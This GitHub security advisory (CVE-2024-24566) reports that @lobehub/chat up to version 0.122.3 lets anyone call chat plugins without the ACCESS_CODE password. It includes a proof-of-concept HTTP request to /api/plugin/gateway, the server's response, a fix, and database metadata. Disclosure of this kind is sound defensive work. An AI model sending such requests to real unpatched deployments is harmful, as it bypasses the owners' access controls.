ghsa-pf55-fj96-xf37
Vulnerability from github
Description:
When the application is password-protected (deployed with the ACCESS_CODE option), it is possible to access plugins without proper authorization (without password).
Proof-of-Concept:
Let’s suppose that application has been deployed with following command:
sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat
Due to the utilization of the ACCESS_CODE, access to the chat is possible only after entering the password:
However, it is possible to interact with chat plugins without entering the ACCESS_CODE.
Example HTTP request:
```
POST /api/plugin/gateway HTTP/1.1
Host: localhost:3210
Content-Length: 1276
{"apiName":"checkWeatherUsingGET","arguments":"{\n \"location\": \"London\"\n}","identifier":"WeatherGPT","type":"default","manifest":{"api":[{"description":"Get current weather information","name":"checkWeatherUsingGET","parameters":{"properties":{"location":{"type":"string"}},"required":["location"],"type":"object"}}],"homepage":"https://weathergpt.vercel.app/legal","identifier":"WeatherGPT","meta":{"avatar":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp","description":"Get current weather information for a specific location.","title":"WeatherGPT"},"openapi":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json","systemRole":"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.","type":"default","version":"1","settings":{"properties":{},"type":"object"}}}
HTTP response:
HTTP/1.1 200 OK
[...]
{"location":{"name":"London","region":"City of London, Greater London","country":"United Kingdom","lat":51.52,"lon":-0.11,"tz_id":"Europe/London","localtime_epoch":1706379026,"localtime":"2024-01-27 18:10"},"current":{"last_updated_epoch":1706378400,"last_updated":"2024-01-27 18:00","temp_c":6,"temp_f":42.8,"is_day":0,"condition":{"text":"Clear","icon":"//cdn.weatherapi.com/weather/64x64/night/113.png","code":1000},"wind_mph":4.3,"wind_kph":6.8,"wind_degree":170,"wind_dir":"S","pressure_mb":1031,"pressure_in":30.45,"precip_mm":0,"precip_in":0,"humidity":81,"cloud":0,"feelslike_c":3.8,"feelslike_f":38.9,"vis_km":10,"vis_miles":6,"uv":1,"gust_mph":9.5,"gust_kph":15.3},"infoLink":"https://weathergpt.vercel.app/London"}
```
Remediation:
Verify the ACCESS_CODE for HTTP requests to the /api/plugin/: route.
Impact:
Unauthorized access to plugins.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.122.3"
},
"package": {
"ecosystem": "npm",
"name": "@lobehub/chat"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.122.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-24566"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-31T18:04:55Z",
"nvd_published_at": "2024-01-31T17:15:39Z",
"severity": "MODERATE"
},
"details": "###\tDescription:\nWhen the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password).\n###\tProof-of-Concept:\nLet\u2019s suppose that application has been deployed with following command:\n```sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat```\nDue to the utilization of the `ACCESS_CODE`, access to the chat is possible only after entering the password:\n \n\n\n\nHowever, it is possible to interact with chat plugins without entering the `ACCESS_CODE`. \nExample HTTP request:\n```\nPOST /api/plugin/gateway HTTP/1.1\nHost: localhost:3210\nContent-Length: 1276\n\n{\"apiName\":\"checkWeatherUsingGET\",\"arguments\":\"{\\n \\\"location\\\": \\\"London\\\"\\n}\",\"identifier\":\"WeatherGPT\",\"type\":\"default\",\"manifest\":{\"api\":[{\"description\":\"Get current weather information\",\"name\":\"checkWeatherUsingGET\",\"parameters\":{\"properties\":{\"location\":{\"type\":\"string\"}},\"required\":[\"location\"],\"type\":\"object\"}}],\"homepage\":\"https://weathergpt.vercel.app/legal\",\"identifier\":\"WeatherGPT\",\"meta\":{\"avatar\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp\",\"description\":\"Get current weather information for a specific location.\",\"title\":\"WeatherGPT\"},\"openapi\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json\",\"systemRole\":\"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it\u0027s being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.\",\"type\":\"default\",\"version\":\"1\",\"settings\":{\"properties\":{},\"type\":\"object\"}}}\n```\nHTTP response:\n```\nHTTP/1.1 200 OK\n[...]\n{\"location\":{\"name\":\"London\",\"region\":\"City of London, Greater London\",\"country\":\"United Kingdom\",\"lat\":51.52,\"lon\":-0.11,\"tz_id\":\"Europe/London\",\"localtime_epoch\":1706379026,\"localtime\":\"2024-01-27 18:10\"},\"current\":{\"last_updated_epoch\":1706378400,\"last_updated\":\"2024-01-27 18:00\",\"temp_c\":6,\"temp_f\":42.8,\"is_day\":0,\"condition\":{\"text\":\"Clear\",\"icon\":\"//cdn.weatherapi.com/weather/64x64/night/113.png\",\"code\":1000},\"wind_mph\":4.3,\"wind_kph\":6.8,\"wind_degree\":170,\"wind_dir\":\"S\",\"pressure_mb\":1031,\"pressure_in\":30.45,\"precip_mm\":0,\"precip_in\":0,\"humidity\":81,\"cloud\":0,\"feelslike_c\":3.8,\"feelslike_f\":38.9,\"vis_km\":10,\"vis_miles\":6,\"uv\":1,\"gust_mph\":9.5,\"gust_kph\":15.3},\"infoLink\":\"https://weathergpt.vercel.app/London\"}\n```\n###\tRemediation:\nVerify the `ACCESS_CODE` for HTTP requests to the `/api/plugin/:` route.\n\n###\tImpact:\nUnauthorized access to plugins.",
"id": "GHSA-pf55-fj96-xf37",
"modified": "2024-01-31T20:25:37Z",
"published": "2024-01-31T18:04:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24566"
},
{
"type": "WEB",
"url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd"
},
{
"type": "PACKAGE",
"url": "https://github.com/lobehub/lobe-chat"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "@lobehub/chat vulnerable to unauthorized access to plugins"
}
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.